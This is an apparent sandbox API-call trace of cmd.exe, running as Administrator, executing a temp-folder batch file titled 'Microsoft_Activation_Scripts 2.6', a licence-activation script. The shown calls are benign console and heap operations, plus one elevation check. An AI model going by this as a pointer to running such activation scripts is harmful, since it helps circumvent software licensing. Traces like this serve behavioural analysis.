[0180.223] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0180.223] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0180.223] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0180.223] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0180.223] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0180.223] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0180.223] GetProcessHeap () returned 0x19a8f1e0000 [0180.223] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1eca00 [0180.223] GetProcessHeap () returned 0x19a8f1e0000 [0180.223] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec980 [0180.223] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.223] GetFileType (hFile=0x24) returned 0x2 [0180.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.223] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe9a8 | out: lpMode=0x43f9efe9a8) returned 1 [0180.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9e0 | out: lpConsoleScreenBufferInfo=0x43f9efe9e0) returned 1 [0180.224] ScrollConsoleScreenBufferW (hConsoleOutput=0x24, lpScrollRectangle=0x43f9efe9d8, lpClipRectangle=0x0, dwDestinationOrigin=0xdcd70000, lpFill=0x43f9efe9d4) returned 1 [0180.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.230] SetConsoleCursorPosition (hConsoleOutput=0x24, dwCursorPosition=0x0) returned 1 [0180.231] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.231] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.231] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.231] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.232] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.232] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.232] SetConsoleInputExeNameW () returned 0x1 [0180.232] GetConsoleOutputCP () returned 0x1b5 [0180.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.233] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.233] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.234] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23af [0180.234] GetProcessHeap () returned 0x19a8f1e0000 [0180.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec980) returned 1 [0180.234] GetProcessHeap () returned 0x19a8f1e0000 [0180.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca00) returned 1 [0180.234] GetProcessHeap () returned 0x19a8f1e0000 [0180.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0180.234] GetProcessHeap () returned 0x19a8f1e0000 [0180.235] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0180.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.235] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23af [0180.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.235] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23b9 [0180.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="color 07\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="color 07\r\n\n===============================================================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 10 [0180.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.235] GetFileType (hFile=0x9c) returned 0x1 [0180.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.235] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23b9 [0180.235] GetProcessHeap () returned 0x19a8f1e0000 [0180.235] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.236] GetProcessHeap () returned 0x19a8f1e0000 [0180.236] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.236] _wcsicmp (_String1="color", _String2=")") returned 58 [0180.236] _wcsicmp (_String1="FOR", _String2="color") returned 3 [0180.236] _wcsicmp (_String1="FOR/?", _String2="color") returned 3 [0180.236] _wcsicmp (_String1="IF", _String2="color") returned 6 [0180.236] _wcsicmp (_String1="IF/?", _String2="color") returned 6 [0180.236] _wcsicmp (_String1="REM", _String2="color") returned 15 [0180.236] _wcsicmp (_String1="REM/?", _String2="color") returned 15 [0180.237] GetProcessHeap () returned 0x19a8f1e0000 [0180.237] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0180.237] GetProcessHeap () returned 0x19a8f1e0000 [0180.237] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.237] GetProcessHeap () returned 0x19a8f1e0000 [0180.237] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec760 [0180.237] _tell (_FileHandle=3) returned 9145 [0180.237] _close (_FileHandle=3) returned 0 [0180.238] _wcsicmp (_String1="color", _String2="DIR") returned -1 [0180.238] _wcsicmp (_String1="color", _String2="ERASE") returned -2 [0180.238] _wcsicmp (_String1="color", _String2="DEL") returned -1 [0180.238] _wcsicmp (_String1="color", _String2="TYPE") returned -17 [0180.238] _wcsicmp (_String1="color", _String2="COPY") returned -4 [0180.238] _wcsicmp (_String1="color", _String2="CD") returned 11 [0180.238] _wcsicmp (_String1="color", _String2="CHDIR") returned 7 [0180.238] _wcsicmp (_String1="color", _String2="RENAME") returned -15 [0180.238] _wcsicmp (_String1="color", _String2="REN") returned -15 [0180.238] _wcsicmp (_String1="color", _String2="ECHO") returned -2 [0180.238] _wcsicmp (_String1="color", _String2="SET") returned -16 [0180.238] _wcsicmp (_String1="color", _String2="PAUSE") returned -13 [0180.238] _wcsicmp (_String1="color", _String2="DATE") returned -1 [0180.238] _wcsicmp (_String1="color", _String2="TIME") returned -17 [0180.238] _wcsicmp (_String1="color", _String2="PROMPT") returned -13 [0180.238] _wcsicmp (_String1="color", _String2="MD") returned -10 [0180.238] _wcsicmp (_String1="color", _String2="MKDIR") returned -10 [0180.238] _wcsicmp (_String1="color", _String2="RD") returned -15 [0180.238] _wcsicmp (_String1="color", _String2="RMDIR") returned -15 [0180.238] _wcsicmp (_String1="color", _String2="PATH") returned -13 [0180.238] _wcsicmp (_String1="color", _String2="GOTO") returned -4 [0180.238] _wcsicmp (_String1="color", _String2="SHIFT") returned -16 [0180.238] _wcsicmp (_String1="color", _String2="CLS") returned 3 [0180.239] _wcsicmp (_String1="color", _String2="CALL") returned 14 [0180.239] _wcsicmp (_String1="color", _String2="VERIFY") returned -19 [0180.239] _wcsicmp (_String1="color", _String2="VER") returned -19 [0180.239] _wcsicmp (_String1="color", _String2="VOL") returned -19 [0180.239] _wcsicmp (_String1="color", _String2="EXIT") returned -2 [0180.239] _wcsicmp (_String1="color", _String2="SETLOCAL") returned -16 [0180.239] _wcsicmp (_String1="color", _String2="ENDLOCAL") returned -2 [0180.239] _wcsicmp (_String1="color", _String2="TITLE") returned -17 [0180.239] _wcsicmp (_String1="color", _String2="START") returned -16 [0180.239] _wcsicmp (_String1="color", _String2="DPATH") returned -1 [0180.239] _wcsicmp (_String1="color", _String2="KEYS") returned -8 [0180.239] _wcsicmp (_String1="color", _String2="MOVE") returned -10 [0180.239] _wcsicmp (_String1="color", _String2="PUSHD") returned -13 [0180.239] _wcsicmp (_String1="color", _String2="POPD") returned -13 [0180.239] _wcsicmp (_String1="color", _String2="ASSOC") returned 2 [0180.239] _wcsicmp (_String1="color", _String2="FTYPE") returned -3 [0180.239] _wcsicmp (_String1="color", _String2="BREAK") returned 1 [0180.239] _wcsicmp (_String1="color", _String2="COLOR") returned 0 [0180.239] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.240] _wcsicmp (_String1="color", _String2="DIR") returned -1 [0180.240] _wcsicmp (_String1="color", _String2="ERASE") returned -2 [0180.240] _wcsicmp (_String1="color", _String2="DEL") returned -1 [0180.240] _wcsicmp (_String1="color", _String2="TYPE") returned -17 [0180.240] _wcsicmp (_String1="color", _String2="COPY") returned -4 [0180.240] _wcsicmp (_String1="color", _String2="CD") returned 11 [0180.240] _wcsicmp (_String1="color", _String2="CHDIR") returned 7 [0180.240] _wcsicmp (_String1="color", _String2="RENAME") returned -15 [0180.240] _wcsicmp (_String1="color", _String2="REN") returned -15 [0180.240] _wcsicmp (_String1="color", _String2="ECHO") returned -2 [0180.240] _wcsicmp (_String1="color", _String2="SET") returned -16 [0180.240] _wcsicmp (_String1="color", _String2="PAUSE") returned -13 [0180.240] _wcsicmp (_String1="color", _String2="DATE") returned -1 [0180.241] _wcsicmp (_String1="color", _String2="TIME") returned -17 [0180.241] _wcsicmp (_String1="color", _String2="PROMPT") returned -13 [0180.241] _wcsicmp (_String1="color", _String2="MD") returned -10 [0180.241] _wcsicmp (_String1="color", _String2="MKDIR") returned -10 [0180.241] _wcsicmp (_String1="color", _String2="RD") returned -15 [0180.241] _wcsicmp (_String1="color", _String2="RMDIR") returned -15 [0180.241] _wcsicmp (_String1="color", _String2="PATH") returned -13 [0180.241] _wcsicmp (_String1="color", _String2="GOTO") returned -4 [0180.241] _wcsicmp (_String1="color", _String2="SHIFT") returned -16 [0180.241] _wcsicmp (_String1="color", _String2="CLS") returned 3 [0180.241] _wcsicmp (_String1="color", _String2="CALL") returned 14 [0180.241] _wcsicmp (_String1="color", _String2="VERIFY") returned -19 [0180.241] _wcsicmp (_String1="color", _String2="VER") returned -19 [0180.241] _wcsicmp (_String1="color", _String2="VOL") returned -19 [0180.241] _wcsicmp (_String1="color", _String2="EXIT") returned -2 [0180.241] _wcsicmp (_String1="color", _String2="SETLOCAL") returned -16 [0180.241] _wcsicmp (_String1="color", _String2="ENDLOCAL") returned -2 [0180.241] _wcsicmp (_String1="color", _String2="TITLE") returned -17 [0180.241] _wcsicmp (_String1="color", _String2="START") returned -16 [0180.241] _wcsicmp (_String1="color", _String2="DPATH") returned -1 [0180.241] _wcsicmp (_String1="color", _String2="KEYS") returned -8 [0180.241] _wcsicmp (_String1="color", _String2="MOVE") returned -10 [0180.242] _wcsicmp (_String1="color", _String2="PUSHD") returned -13 [0180.242] _wcsicmp (_String1="color", _String2="POPD") returned -13 [0180.242] _wcsicmp (_String1="color", _String2="ASSOC") returned 2 [0180.242] _wcsicmp (_String1="color", _String2="FTYPE") returned -3 [0180.242] _wcsicmp (_String1="color", _String2="BREAK") returned 1 [0180.242] _wcsicmp (_String1="color", _String2="COLOR") returned 0 [0180.242] GetProcessHeap () returned 0x19a8f1e0000 [0180.242] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6e0 [0180.242] GetProcessHeap () returned 0x19a8f1e0000 [0180.242] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb6e0, Size=0x18) returned 0x19a8f1ec700 [0180.242] GetProcessHeap () returned 0x19a8f1e0000 [0180.242] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec700) returned 0x18 [0180.242] GetProcessHeap () returned 0x19a8f1e0000 [0180.242] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb920 [0180.242] _wcsnicmp (_String1="07", _String2="on", _MaxCount=0x2) returned -63 [0180.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.242] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9a8 | out: lpConsoleScreenBufferInfo=0x43f9efe9a8) returned 1 [0180.243] FillConsoleOutputAttribute (in: hConsoleOutput=0x24, wAttribute=0x7, nLength=0x107b38, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x43f9efe9a4 | out: lpNumberOfAttrsWritten=0x43f9efe9a4) returned 1 [0180.243] SetConsoleTextAttribute (hConsoleOutput=0x24, wAttributes=0x7) returned 1 [0180.244] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.244] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.244] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.244] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.245] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.245] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.245] SetConsoleInputExeNameW () returned 0x1 [0180.245] GetConsoleOutputCP () returned 0x1b5 [0180.246] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.246] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.246] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.246] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.246] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23b9 [0180.246] GetProcessHeap () returned 0x19a8f1e0000 [0180.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.247] GetProcessHeap () returned 0x19a8f1e0000 [0180.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0180.247] GetProcessHeap () returned 0x19a8f1e0000 [0180.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec760) returned 1 [0180.247] GetProcessHeap () returned 0x19a8f1e0000 [0180.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.247] GetProcessHeap () returned 0x19a8f1e0000 [0180.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0180.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.248] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23b9 [0180.248] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.248] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9191, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23e7 [0180.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Microsoft_Activation_Scripts %masver%\r\n", cbMultiByte=46, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="title Microsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 46 [0180.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.248] GetFileType (hFile=0x9c) returned 0x1 [0180.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.248] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23e7 [0180.248] GetProcessHeap () returned 0x19a8f1e0000 [0180.248] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.248] GetProcessHeap () returned 0x19a8f1e0000 [0180.248] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0180.249] GetProcessHeap () returned 0x19a8f1e0000 [0180.249] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb920 [0180.249] GetEnvironmentVariableW (in: lpName="masver", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3 [0180.249] GetProcessHeap () returned 0x19a8f1e0000 [0180.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.249] GetProcessHeap () returned 0x19a8f1e0000 [0180.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0180.250] GetProcessHeap () returned 0x19a8f1e0000 [0180.250] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.251] _wcsicmp (_String1="title", _String2=")") returned 75 [0180.251] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0180.251] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0180.251] _wcsicmp (_String1="IF", _String2="title") returned -11 [0180.251] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0180.251] _wcsicmp (_String1="REM", _String2="title") returned -2 [0180.251] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0180.251] GetProcessHeap () returned 0x19a8f1e0000 [0180.251] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0180.252] GetProcessHeap () returned 0x19a8f1e0000 [0180.252] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0180.252] GetProcessHeap () returned 0x19a8f1e0000 [0180.252] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8a60 [0180.252] _tell (_FileHandle=3) returned 9191 [0180.252] _close (_FileHandle=3) returned 0 [0180.252] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0180.252] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0180.252] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0180.252] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0180.252] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0180.252] _wcsicmp (_String1="title", _String2="CD") returned 17 [0180.252] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0180.252] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0180.252] _wcsicmp (_String1="title", _String2="REN") returned 2 [0180.252] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0180.253] _wcsicmp (_String1="title", _String2="SET") returned 1 [0180.253] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0180.253] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0180.253] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0180.253] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0180.254] _wcsicmp (_String1="title", _String2="MD") returned 7 [0180.254] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0180.254] _wcsicmp (_String1="title", _String2="RD") returned 2 [0180.254] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0180.254] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0180.254] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0180.254] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0180.254] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0180.254] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0180.254] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0180.254] _wcsicmp (_String1="title", _String2="VER") returned -2 [0180.254] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0180.254] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0180.254] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0180.254] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0180.254] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0180.254] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.255] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0180.255] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0180.255] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0180.255] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0180.255] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0180.255] _wcsicmp (_String1="title", _String2="CD") returned 17 [0180.255] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0180.255] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0180.255] _wcsicmp (_String1="title", _String2="REN") returned 2 [0180.255] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0180.255] _wcsicmp (_String1="title", _String2="SET") returned 1 [0180.255] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0180.255] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0180.255] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0180.255] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0180.256] _wcsicmp (_String1="title", _String2="MD") returned 7 [0180.256] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0180.256] _wcsicmp (_String1="title", _String2="RD") returned 2 [0180.256] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0180.256] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0180.256] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0180.256] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0180.256] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0180.256] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0180.256] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0180.256] _wcsicmp (_String1="title", _String2="VER") returned -2 [0180.256] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0180.256] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0180.256] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0180.256] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0180.256] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0180.256] GetProcessHeap () returned 0x19a8f1e0000 [0180.256] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200190 [0180.256] GetProcessHeap () returned 0x19a8f1e0000 [0180.256] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200190, Size=0x54) returned 0x19a8f1f8700 [0180.256] GetProcessHeap () returned 0x19a8f1e0000 [0180.256] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8700) returned 0x54 [0180.257] GetProcessHeap () returned 0x19a8f1e0000 [0180.257] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x62) returned 0x19a8f1eaed0 [0180.257] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x43f9efe7a8 | out: TokenHandle=0x43f9efe7a8*=0x0) returned 0xc000007c [0180.257] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x43f9efe7a8 | out: TokenHandle=0x43f9efe7a8*=0x9c) returned 0x0 [0180.257] NtQueryInformationToken (in: TokenHandle=0x9c, TokenInformationClass=0x12, TokenInformation=0x43f9efe758, TokenInformationLength=0x4, ReturnLength=0x43f9efe760 | out: TokenInformation=0x43f9efe758, ReturnLength=0x43f9efe760) returned 0x0 [0180.257] NtQueryInformationToken (in: TokenHandle=0x9c, TokenInformationClass=0x1a, TokenInformation=0x43f9efe760, TokenInformationLength=0x4, ReturnLength=0x43f9efe758 | out: TokenInformation=0x43f9efe760, ReturnLength=0x43f9efe758) returned 0x0 [0180.257] NtClose (Handle=0x9c) returned 0x0 [0180.257] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x43f9efe770, nSize=0x0, Arguments=0x43f9efe778 | out: lpBuffer="绐輞ƚ") returned 0xf [0180.257] GetProcessHeap () returned 0x19a8f1e0000 [0180.257] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20d370 [0180.257] SetConsoleTitleW (lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 1 [0180.260] GetProcessHeap () returned 0x19a8f1e0000 [0180.261] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d370) returned 1 [0180.261] LocalFree (hMem=0x19a8f1e7ed0) returned 0x0 [0180.261] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.261] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.261] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.261] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.262] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.262] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.262] SetConsoleInputExeNameW () returned 0x1 [0180.262] GetConsoleOutputCP () returned 0x1b5 [0180.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.263] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.263] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0180.263] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.263] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9191, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23e7 [0180.263] GetProcessHeap () returned 0x19a8f1e0000 [0180.264] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0180.264] GetProcessHeap () returned 0x19a8f1e0000 [0180.265] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8700) returned 1 [0180.265] GetProcessHeap () returned 0x19a8f1e0000 [0180.265] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8a60) returned 1 [0180.265] GetProcessHeap () returned 0x19a8f1e0000 [0180.265] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) 